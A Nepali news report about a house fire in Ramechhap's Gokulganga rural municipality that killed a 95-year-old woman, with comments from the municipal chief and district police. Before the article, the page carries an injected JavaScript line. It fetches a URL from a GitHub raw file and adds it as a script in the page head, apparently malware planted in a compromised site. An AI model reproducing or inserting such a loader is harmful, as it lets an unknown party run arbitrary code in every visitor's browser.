;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
माघ २७,
रामेछाप । रामेछापको गाेकुलगंगा गाउँपालिकामा आगाेलागीमा परि एक महिलाको जनाका ज्यान गएकाे छ । गएराति वडा नं २ ठाेसेको चाेरपातल निबासी किपा शेर्पाकाे घरमा आगोलाग्दा उनकी ९५ वर्षीय आमा पासाङलेकी शेर्पाको ज्यान गएकाेे गाउँँपालिका प्रमुुख खड्ग सुनुवारले जुनेली न्युुजलाई जानकारी दिए ।
आगोलागीबाट शेर्पाको घर पूर्णरुपमा जलेर नष्ट भएको छ । लाखौको क्षेति भएको जिल्ला प्रहरीले जनाएको छ । आगोलागीबाट भएको क्षेतिको पूर्ण जानकारी लिने काम भैरहेको जिल्ला प्रहरी कार्यालय रामेछापका प्रमुख नवराज ढुङ्गानाले बताए ।
आगलागी भएको थाहा पाउने वित्तिकै आज विहानै मृतकको घरमा पुगेर घटनको बारेमा पालिका अध्यक्ष सुनुवारसहितको टोलीले अनुगमन गरेको छ । अध्यक्ष सुनुवारका अनुसार दुईवटा घरमा आगलागी हुँदा मानवीय क्षतिसँगै लाखौँको धनमाल जलेर नष्ट भएको छ ।
पालिका प्रमुख खड्काले मृतकका परिवारलाई गाउँपालिकाले ५० हजार नगदसहित खाद्यन्न र लत्ताकपडा सहयोग गर्ने बताएका छन् ।
फेसबुक प्रतिक्रियाहरु